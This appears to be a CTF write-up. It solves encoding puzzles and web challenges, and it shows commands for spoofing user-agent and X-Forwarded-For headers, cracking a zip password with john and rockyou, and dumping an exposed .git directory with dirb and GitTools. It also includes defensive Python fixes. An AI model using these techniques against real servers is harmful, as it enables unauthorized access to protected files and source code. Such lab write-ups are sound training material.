Pastebin style!
1 Flag format is always esecurity{xxxxx}.
Can you find the first flag? ZXNlY3VyaXR5e3dhcm1pbmdfdXB9
base64
2 We’ve found this strange code and we’re unsure what it is. Can you help us and decode it and recover the flag?
JSFuck
2 Can you open this file?
On Unix-like systems (macOS), nobody cares about extensions; magic bytes rule…
Can you see us? 3 Can you? http://178.22.217.52/canyouseeme/
Cookies
curl -I http://178.22.217.52/canyouseeme/
4 We’ve discovered this strange audio file on one of our servers. It should contain the flag but we weren’t able to recover it. While trying to recover the flag 2 of our team members ended up like Jack Nicholson in The Shining. Third one ended up like Jack Nicholson in One Flew Over the Cuckoo’s Nest.
Hint: don’t forget about correct flag format: esecurity{XXXXXXX}
https://www.sonicvisualiser.org/download.html
–..– –..– – — .-. … . .. … ..-. ..- .- .. … - …. . ..-. .-.. .- –. -… ..- - -.. — -. - ..-. — .-. –. . - - …. . -.-. ..- .-. .-.. - .-.. -… .-. .- -.-. -.- . - …
https://cryptii.com/pipes/morse-code-to-text
Read the flag to get the answer.
##Logo
5
Someone told us that there is something hidden in our logo. Could you please check and let us know?
$ exiftool
...
User Comment : 5c87N7XYVY7kmTLaVN5NU5smnqrL3adgwtSBPd5N
...
https://gchq.github.io/CyberChef/
Thanks to EK for cracking this one :D
base58 bitcoin
5 We encrypted this flag very securely. There is no way you’ll be able to decode it.
Vigenere dcode.fr
5
This challenge is not meant for you. See, you won’t be able to get the flag: http://hfl.esecurity.rs/robots/
curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" http://178.22.217.52/robots/flag/flag.txt
5 We’ve created this challenge but unfortunately we can’t remember the password. Guess there is no way to recover it now. Maybe we can throw rocks on it and hope it breaks open?
$ zip2john flag.zip > key.txt
kali@kali:~/Documents/esecurity$ john --format=zip --wordlist=/usr/share/wordlists/rockyou.txt key.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Badminton1234 (flag.zip/flag.txt)
1g 0:00:10:13 DONE (2020-03-31 14:48) 0.001629g/s 18526p/s 18526c/s 18526C/s Bado89..Badgirl01
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/Documents/esecurity$ 7z e flag.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz (306F2),ASM,AES-NI)
Scanning the drive for archives:
1 file, 231 bytes (1 KiB)
Extracting archive: flag.zip
--
Path = flag.zip
Type = zip
Physical Size = 231
Enter password (will not be echoed):
Everything is Ok
Size: 39
Compressed: 231
kali@kali:~/Documents/esecurity$ cat flag.txt
esecurity{flag}
6 Our security engineers hardened this flag so it’s only accessible within our own network. There is no way you’ll be able to recover it: http://hfl.esecurity.rs/fromhome/flag.txt
curl --header "X-Forwarded-For: 127.0.0.1" "http://hfl.esecurity.rs/fromhome/flag.txt"
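Why the header trick works, and the server-side fix, as an added example (not code from the challenge or this writeup): the naive check believes the client-supplied X-Forwarded-For, the hardened one only honours it when the TCP peer is a known proxy. The proxy address 10.0.0.5, the internal ranges and the sample requests are constructed assumptions.

```python
import ipaddress

# Assumed policy: "our own network" means loopback plus the RFC 1918 ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip):
    """True only for a syntactically valid address inside INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address((ip or "").strip())
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)

def client_ip_naive(peer_ip, headers):
    """Vulnerable: the first X-Forwarded-For entry is whatever the client typed."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip

def client_ip_hardened(peer_ip, headers, trusted_proxies):
    """Use the TCP peer unless it is one of our proxies; then take the
    right-most hop our proxies appended, never the client-supplied left side."""
    if peer_ip not in trusted_proxies:
        return peer_ip
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop
    return None  # proxy sent no usable hop: treat as unknown, which is denied

# Constructed requests: (TCP peer, headers). 10.0.0.5 is a hypothetical reverse proxy.
PROXIES = {"10.0.0.5"}
DIRECT_SPOOF = ("203.0.113.7", {"X-Forwarded-For": "127.0.0.1"})
VIA_PROXY_SPOOF = ("10.0.0.5", {"X-Forwarded-For": "127.0.0.1, 203.0.113.7"})
VIA_PROXY_INSIDE = ("10.0.0.5", {"X-Forwarded-For": "192.168.1.20"})

if __name__ == "__main__":
    for peer, hdrs in (DIRECT_SPOOF, VIA_PROXY_SPOOF, VIA_PROXY_INSIDE):
        naive = is_internal(client_ip_naive(peer, hdrs))
        hard = is_internal(client_ip_hardened(peer, hdrs, PROXIES))
        print(f"peer={peer:<12} naive_allows={naive} hardened_allows={hard}")
```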
6 I just came here to show you my crazy php coding skillz: http://hfl.esecurity.rs/leakme/
this is my php script. actually it's not a php script, it's just text
file with a fancy extension.
Don't be harsh, I'm still learning this.
After almost 60 days stuck in it,
I've finally managed to learn how to exit vim but
during exiting I've probably made some changes
to vim configuration and some hackers told me that
now my source code is leaking.
Please don't hack me.
Vim stores backup files with a trailing ~ appended to the filename.
http://hfl.esecurity.rs/leakme/index.php~
6 You’ll retrieve this flag only by praying
Image
https://en.wikipedia.org/wiki/The_Ciphers_of_the_Monks
101 115 101 99 117 114 105 116 121 123 99 111 100 101 95 111 102 95 103 111 100 125 esecurity{xxx}
Easier way: https://www.dcode.fr/cistercian-numbers
Thanks to EK for cracking this one with me.
6
First you’ll need to find out who I am. That will help you to decode this message.
I’m the one who invented both of these stuff:
osintcrypto.txt
{"encrypted_flag" : "CNHPARVNE9MQ8YBVD9SPYVJZC5Q68QVMD1MQ6QVKEHS62VK7CNFP4RBKCMSK4Z8"}
json and encoding
https://en.wikipedia.org/wiki/Douglas_Crockford
https://www.dcode.fr/crockford-base-32-encoding
##My Secure Blog
10
No more Wordpress for me, I’m not a noob anymore. I’ve created this static html website, super secure, unhackable. Wordpress is now removed and I have backups and version control. No way you’ll be able to hack me.
Check it out: http://178.22.217.52/mysecureblog/
Source:
<!--Don't forget to remove version-control system from web root before deployment -->
kali@kali:~/opt/dvcs-ripper$ dirb http://178.22.217.52/mysecureblog/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Apr 1 12:25:28 2020
URL_BASE: http://178.22.217.52/mysecureblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://178.22.217.52/mysecureblog/ ----
+ http://178.22.217.52/mysecureblog/.git/HEAD (CODE:200|SIZE:23)
+ http://178.22.217.52/mysecureblog/index.html (CODE:200|SIZE:1614)
-----------------
END_TIME: Wed Apr 1 12:28:29 2020
DOWNLOADED: 4612 - FOUND: 2
http://178.22.217.52/mysecureblog/.git/HEAD
ref: refs/heads/master
http://178.22.217.52/mysecureblog/.git/config
https://github.com/internetwache/GitTools
kali@kali:~/opt/GitTools/Dumper$ ./gitdumper.sh http://178.22.217.52/mysecureblog/.git/ aa
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[+] Creating aa/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/39/42bcae4b0bee131298b40f4a7c5afcb490fab2
[-] Downloaded: objects/00/00000000000000000000000000000000000000
...
kali@kali:~/opt/GitTools/Extractor/aa$ ./extractor.sh ../Dumper/aa/ aa
kali@kali:~/opt/GitTools/Extractor/aa/0-3942bcae4b0bee131298b40f4a7c5afcb490fab2$ grep -H esecurity *
grep: css: Is a directory
grep: images: Is a directory
grep: includes: Is a directory
grep: js: Is a directory
grep: maint: Is a directory
grep: network: Is a directory
grep: user: Is a directory
users.php:secret esecurity stuff: ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
kali@kali:~/Documents/esecurity/aa$ echo 'ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9' | base64 -d
esecurity{FLAG}
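A pre-deployment check that would have caught both this exposed .git directory and the index.php~ leak from the Vim challenge, as an added example (not part of the original writeup or of GitTools). The pattern list and the sample tree are constructed assumptions.

```python
import fnmatch
import os
import tempfile

VCS_DIRS = {".git", ".svn", ".hg", ".bzr"}
# Editor and merge leftovers; the pattern list is an assumption, extend it for your tooling.
LEFTOVER_PATTERNS = ("*~", "*.swp", "*.swo", "*.bak", "*.orig")

def audit_webroot(root):
    """Return sorted (kind, relative_path) findings for files that should not be served."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in list(dirnames):
            if d in VCS_DIRS:
                findings.append(("vcs-metadata", os.path.relpath(os.path.join(dirpath, d), root)))
                dirnames.remove(d)  # one finding per repository, do not descend into it
        for f in filenames:
            if any(fnmatch.fnmatch(f, p) for p in LEFTOVER_PATTERNS):
                findings.append(("editor-leftover", os.path.relpath(os.path.join(dirpath, f), root)))
    return sorted(findings)

def build_sample_webroot():
    """Constructed tree mirroring the two challenges: a .git directory and index.php~."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.html": "<html></html>",
        "index.php": "<?php echo 'hi'; ?>",
        "index.php~": "<?php /* previous revision */ ?>",
        ".index.php.swp": "swap",
        ".git/HEAD": "ref: refs/heads/master\n",
        ".git/config": "[core]\n",
        "js/app.js": "",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for kind, path in audit_webroot(build_sample_webroot()):
        print(f"{kind:16} {path}")
```

Run it against the directory that is about to be published and fail the deployment if the list is not empty.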
import codecs
# ROT13 is its own inverse, so encode and decode do the same thing.
codecs.decode('aa', 'rot_13')  # 'nn'
codecs.encode('nn', 'rot_13')  # 'aa'